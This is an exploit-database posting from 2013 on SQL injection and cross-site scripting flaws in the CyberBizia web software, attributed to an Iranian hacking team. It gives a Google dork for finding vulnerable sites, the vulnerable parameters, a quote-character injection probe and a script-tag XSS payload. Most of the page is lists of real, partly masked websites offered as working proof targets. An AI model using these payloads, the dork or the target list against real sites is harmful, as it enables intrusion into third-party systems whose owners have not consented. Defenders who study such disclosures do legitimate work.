Home / exploits CyberBizia Multiple Vulnerabilites
Posted on 30 August 2013
<pre> #******************************************************************************** # Exploit Title : CyberBizia Multiple Vulnerabilites # # Software link : http://www.cyberbizia.com # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by CyberBizia" # # Date: 2013/08/29 # -------------------------------------------------------------------- # Exploit 1 : Sql Inkection # # Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection] # # # Proof: # # http://www.advancXXXiology.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.artiXXXri.com/myasg/os.asp?elenca=mese&mese=1' # # http://www.basketXXXtu.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.cdsdonXXXliari.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.digXXXt.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.cosXXXo.com/myasg/os.asp?elenca=mese&mese=1' # # http://www.cdsdXXXecagliari.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.baskXXXrtu.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.immobiXXXacanze.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.magXXweb.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.archXXXeno.it/myasg/os.asp?elenca=mese&mese=1' -------------------------------------------------------------------- # Exploit 2 : # # Location : [Target]t/?Title=[xss] # # # Proof: # # http://www.advaXXXdiology.it/?Title="/><script>alert(1);</script> # # http://www.artXri.com/?Title="/><script>alert(1);</script> # # http://www.basketquartXXu.it/?Title="/><script>alert(1);</script> # # http://www.cdsdonnXXXecagliari.it/?Title="/><script>alert(1);</script> # # http://www.digicsXXoft.it/?Title="/><script>alert(1);</script> # # http://www.costiaXXXuto.com/?Title="/><script>alert(1);</script> # # http://www.cdsdonXXnecagliari.it/?Title="/><script>alert(1);</script> # # http://www.baskXXuartu.it/?Title="/><script>alert(1);</script> # # http://www.iXXXarevacanze.it/?Title="/><script>alert(1);</script> # # http://www.mozXXXna.com/?Title="/><script>alert(1);</script> # # http://www.aXXXXXXleno.it/?Title="/><script>alert(1);</script> # ###################### discovered by : ACC3SS ###################### </pre>
